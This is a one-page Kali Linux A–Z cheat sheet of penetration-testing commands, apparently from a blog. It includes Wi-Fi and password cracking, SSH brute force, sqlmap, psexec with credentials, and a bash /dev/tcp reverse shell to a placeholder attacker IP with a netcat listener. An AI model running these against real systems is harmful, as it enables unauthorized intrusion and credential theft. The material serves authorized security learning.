Kali Linux Cheat Sheet (A–Z) for Cybersecurity Engineers & Enthusiasts
Kali Linux A–Z Quick Reference Poster
Condensed one-page cheat sheet — essential tools & commands for fast recall.
Condensed one-page cheat sheet — essential tools & commands for fast recall.
A — Aircrack-ngairmon-ng start wlan0
airodump-ng wlan0mon -w capture
aircrack-ng -w rockyou.txt capture.cap
B — Burp Suiteburpsuite # launch web proxy
C — Curl / Crontabcurl -I https://site
crontab -l
D — Dirb / Diggobuster dir -u http://target -w /usr/share/wordlists/common.txt
dig example.com
E — Enum4linuxenum4linux -a target
F — Find / Ffuffind / -name "secret*" 2>/dev/null
ffuf -u http://target/FUZZ -w wordlist.txt
G — Gobuster / Grepgobuster dir -u http://target -w common.txt
grep -Rni "password" .
H — Hydra / Hashcathydra -l admin -P rockyou.txt ssh://target
hashcat -m 1000 hash.txt rockyou.txt
I — Impacketpsexec.py DOMAIN/user:pass@target
J — Johnjohn --wordlist=rockyou.txt hashfile
K — Kali Undercoverkali-undercover
L — Linpeas./linpeas.sh
M — Metasploit / Masscanmsfconsole
masscan -p1-65535 10.0.0.0/8 --rate=10000
N — Nmap / Netcatnmap -sS -sV -p- target
nc -lvnp 4444
O — OSINTtheharvester -d example.com -b all
P — Python HTTP Serverpython3 -m http.server 8000
Q — Quick Reconwhatweb https://site
R — Reverse Shellbash -i >& /dev/tcp/ATT_IP/4444 0>&1
S — Sqlmap / SMBsqlmap -u "http://site/page.php?id=1" --dbs
smbclient -L \\TARGET -U ""
T — Tcpdump / Toptcpdump -i eth0 -w cap.pcap
top
U — Updatesudo apt update && sudo apt full-upgrade -y
V — Volatilityvolatility -f memory.dmp pslist
W — Wireshark / Wpscanwireshark cap.pcap
wpscan --url http://site
X — XSS Testcurl "http://site?q=<script>alert(1)</script>"
Y — Yersiniayersinia -I
Z — Zone Transferdig axfr example.com @ns1.example.com
Must-know Wordlists
-
/usr/share/wordlists/rockyou.txt
-
/usr/share/seclists/
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/
Comments
Post a Comment